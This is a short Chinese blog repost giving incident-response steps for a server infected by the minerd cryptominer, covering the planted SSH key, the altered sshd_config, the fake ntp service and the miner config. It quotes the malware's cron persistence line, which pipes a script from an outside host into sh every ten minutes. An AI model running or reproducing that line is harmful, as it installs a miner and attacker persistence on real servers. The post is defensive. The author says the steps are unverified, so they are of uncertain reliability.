码迷,mamicode.com
首页 > 其他好文 > 详细

服务器被minerd

时间:2018-09-11 19:35:09      阅读:126      评论:0      收藏:0      [点我收藏+]

标签:ssh   chmod   删除   usr   authorize   防止   http   启动文件   直接   

cd /opt
chmod -x minerd 
去/root/.ssh 目录下,清除authorized_keys,KHK75NEOiq  文件
在ssh的配置文件/etc/ssh/sshd_config中也可以看到把AuthorizedKeysFile指向了这个文件了(.ssh/KHK75NEOiq)

1、crontab上的命令删除掉

"*/10* * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" >/var/spool/cron/root

mkdir-p /var/spool/cron/crontabs

"*/10* * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" >/var/spool/cron/crontabs/root

2、去掉ssh/authorized_keys

~/.ssh/KHK75NEOiq

被替换的/etc/ssh/sshd_config拿其他服务器上的替换掉。替换后重启sshd,记得更改root相关密码,防止黑客登陆。

3、删除相关管理的黑客程序启动文件,伪进程/etc/init.d/ntp删除并kill掉它启动的进程;

4、/usr/local/etc/minerd.conf里的minerd启动配置删除或者直接删除/usr/local/etc/minerd.conf

ps:在群里看到的不知道有没有效,没验证过

服务器被minerd

标签:ssh   chmod   删除   usr   authorize   防止   http   启动文件   直接   

原文地址:https://www.cnblogs.com/pcx105/p/9629606.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!